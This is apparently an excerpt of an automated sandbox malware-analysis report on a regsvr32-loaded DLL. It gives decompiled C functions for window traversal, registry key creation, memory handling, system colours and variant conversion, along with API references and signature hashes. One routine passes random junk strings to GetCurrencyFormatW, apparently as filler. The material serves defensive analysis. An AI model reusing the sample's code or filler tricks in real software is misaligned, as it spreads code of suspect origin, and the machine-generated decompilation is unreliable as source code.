						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1000EFB3(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1001A96C(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E1000A8F0(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1001A917(_t45, E1000A8F0(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

APIs

GetWindow.USER32(?,00000002), ref: 1001A987
GetParent.USER32(?), ref: 1001A998
GetWindow.USER32(?,00000002), ref: 1001A9BB
GetWindow.USER32(?,00000002), ref: 1001A9CD
GetWindowLongA.USER32 ref: 1001A9DC
IsWindowVisible.USER32(?), ref: 1001A9F6
GetTopWindow.USER32(?), ref: 1001AA1C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
Instruction ID: afcf25548e9ffcd49ee0c38f979e935dd92c7862c2c1ebd23c82871fc7a90cd9
Opcode Fuzzy Hash: 88551c36cc544e916e0c72ef4a85d69b0a9d81e295017d87dfa12ef8939d57f5
Instruction Fuzzy Hash: 0121B232A407516FD621DA758D05F1B76ECFF4A690F424524F981AF152EB30ECC0C761

Uniqueness

Uniqueness Score: -1.00%

Function 10010EA7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010EA7(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10010ec2
0x10010ec9
0x10010ecc
0x10010ecf
0x10010ed2
0x10010edd
0x10010f14
0x10010f14
0x10010f1f
0x10010f24
0x10010f24
0x10010f29
0x10010f2e
0x10010f2e
0x10010f37

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10010ED5
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010EF8
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10010F14
RegCloseKey.ADVAPI32(?), ref: 10010F24
RegCloseKey.ADVAPI32(?), ref: 10010F2E

Strings

software, xrefs: 10010EBD

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
Instruction ID: 6908282d98887baf5b1b11d67664c0e969dcc26382147783454bf2a56fb15221
Opcode Fuzzy Hash: e64cde27f10a0a0aba8dc504e002967937950267acbfc865cd82a8aca435e45d
Instruction Fuzzy Hash: DF11E376D00159FBDB21DB9ACD89CDFFFBCEF89750B1040AAB600A6122D2709A41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 100021CE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrencyFormatW.KERNEL32 ref: 100021FF
GetCurrencyFormatW.KERNEL32 ref: 10002222
GetCurrencyFormatW.KERNEL32 ref: 10002238
GetCurrencyFormatW.KERNEL32 ref: 1000225F

Strings

xadqsavcbdfewescGADW, xrefs: 100021DE, 100021EC, 10002211, 10002254
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100021DF, 100021F2, 100021F7, 10002217, 1000225B

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
Instruction ID: 4ec50c83481157a01d9dbb3de4afa19c59092b64c33b3db984519a0354e02278
Opcode Fuzzy Hash: 3740243ae41b412f6c7efa0a5dfd7ed28a793f15c4669b8cc4e09e40b240e682
Instruction Fuzzy Hash: 18115176604225BFE201DB85DD81E96B7DCEF4A784F024046FF44EB2A1C721BC548EA5

Uniqueness

Uniqueness Score: -1.00%

Function 100109B6 Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100109B6(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E100209E8(0, 0);
				_t22 = E100010C9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E10004E3A(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E10020F40(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E1001FC9C(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 100109BD
__CxxThrowException@8.LIBCMT ref: 100109C7

Part of subcall function 100209E8: RaiseException.KERNEL32(1000511C,?,1000103F,8007000E,1000511C,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10020A28

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6), ref: 100109DE
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB

Part of subcall function 10004E3A: __CxxThrowException@8.LIBCMT ref: 10004E4E

_memset.LIBCMT ref: 10010A0A
TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
Instruction ID: 46b5b42a71e0509a224d2307cf2bd15c4222dc2e63f5f7ecafe87185b2be41b2
Opcode Fuzzy Hash: 703a19eeb46c99ea21d6c69b5bd9b656ccc1b49fdf645057963fa64401da5aa6
Instruction Fuzzy Hash: CC117C74100605AFE721EF60CC8AC6BBBA5FF08354B50C129F9869A567CB71ED90CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10010DB4 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010DB4(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x10010dbe
0x10010dc4
0x10010dcb
0x10010dd2
0x10010dd9
0x10010de6
0x10010ded
0x10010df0
0x10010df3
0x10010df7

APIs

GetSysColor.USER32(0000000F), ref: 10010DC0
GetSysColor.USER32(00000010), ref: 10010DC7
GetSysColor.USER32(00000014), ref: 10010DCE
GetSysColor.USER32(00000012), ref: 10010DD5
GetSysColor.USER32(00000006), ref: 10010DDC
GetSysColorBrush.USER32(0000000F), ref: 10010DE9
GetSysColorBrush.USER32(00000006), ref: 10010DF0

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
Instruction ID: d7120ba38cccac322e287d397fd1090e884fedfb1f22003e23e449693bce91bf
Opcode Fuzzy Hash: 8baa675a9de521262c06e8bf4c8287c80497927c79e6d32d2b99b962be8a4700
Instruction Fuzzy Hash: 4DF0F8719407489BE730BB728D49B47BAE1EFC4B10F02092AD2818BA91E6B6E0409F40

Uniqueness

Uniqueness Score: -1.00%

Function 10019F87 Relevance: 9.4, APIs: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10019F87(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x10045580; // 0x771f5646
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1001FBC4(E10034676, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E10004E6E(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E1001BDF4(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E10017AC2( *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E10015BAB( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E10017807(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x10038c38;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E1001BDD4(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E10015A3D(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E1001BDD4(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E10015A9D( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E1001BDD4(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E10017866(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E10017A12(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E1001BDD4(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E1000563B(0, _t346 + 0x50, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E1001C08A(0, _t346 - 0xbc, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E1001BDD4(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E1001BD1D(_t346 - 0x9c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E1001BDD4(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E1001BF8E(_t346 - 0x8c, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E1001BDD4(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E1001BDD4(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E10005525(0, _t346 + 0x30, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E1001C08A(0, _t346 - 0xcc, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E1001BDD4(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										E10001260(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E1001BD1D(_t346 - 0xac,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E1001BDD4(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E1001BD44(_t346 - 0x7c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E1001BDD4(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E1001BDD4(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E1001BDD4(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E1001BDD4(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E1001BDD4(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1001FBB5( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}

0x10019f87
0x10019f87
0x10019f87
0x10019f8b
0x10019f8f
0x10019f96
0x10019f99
0x10019fa3
0x10019fad
0x10019fb2
0x10019fb4
0x10019fb7
0x10019fbd
0x10019fbf
0x10019fc1
0x10019fc1
0x10019fc1
0x10019fd0
0x00000000
0x00000000
0x10019fd6
0x10019fe0
0x10019fe8
0x10019feb
0x10019fee
0x10019ff6
0x1001a013
0x1001a01f
0x1001a024
0x1001a026
0x00000000
0x1001a028
0x1001a028
0x1001a02c
0x1001a037
0x1001a039
0x1001a293
0x1001a293
0x1001a298
0x00000000
0x1001a29e
0x1001a29e
0x1001a29e
0x1001a29f
0x1001a3d7
0x1001a3dc
0x1001a3de
0x1001a3e4
0x1001a3e7
0x1001a3ea
0x1001a3ec
0x1001a3ec
0x1001a3ec
0x1001a3ec
0x1001a3ef
0x1001a3ef
0x1001a3ec
0x1001a3f7
0x1001a3fa
0x1001a3fc
0x1001a3fc
0x1001a3fe
0x1001a401
0x1001a40e
0x1001a412
0x1001a417
0x00000000
0x1001a417
0x1001a2a5
0x1001a2a6
0x1001a2a6
0x1001a2a7
0x1001a380
0x1001a382
0x1001a38c
0x1001a392
0x1001a395
0x1001a3a2
0x1001a3a5
0x1001a3aa
0x1001a3b3
0x1001a3bd
0x1001a3c1
0x1001a3c6
0x00000000
0x1001a3c6
0x1001a2ad
0x1001a2ad
0x1001a2ad
0x1001a2ae
0x1001a322
0x1001a327
0x1001a329
0x1001a333
0x1001a336
0x1001a346
0x1001a349
0x1001a34e
0x1001a357
0x1001a361
0x1001a365
0x1001a36a
0x00000000
0x1001a36a
0x1001a2b0
0x1001a2b0
0x1001a2b1
0x1001a2c0
0x1001a2c5
0x1001a2c7
0x1001a2f1
0x1001a2f6
0x1001a2fe
0x1001a308
0x1001a30c
0x1001a311
0x00000000
0x1001a311
0x1001a2c7
0x1001a2b1
0x1001a2ae
0x1001a2a7
0x1001a29f
0x1001a03f
0x1001a03f
0x1001a25c
0x1001a26c
0x1001a270
0x1001a279
0x1001a27d
0x1001a289
0x1001a28b
0x00000000
0x1001a045
0x1001a045
0x1001a048
0x1001a137
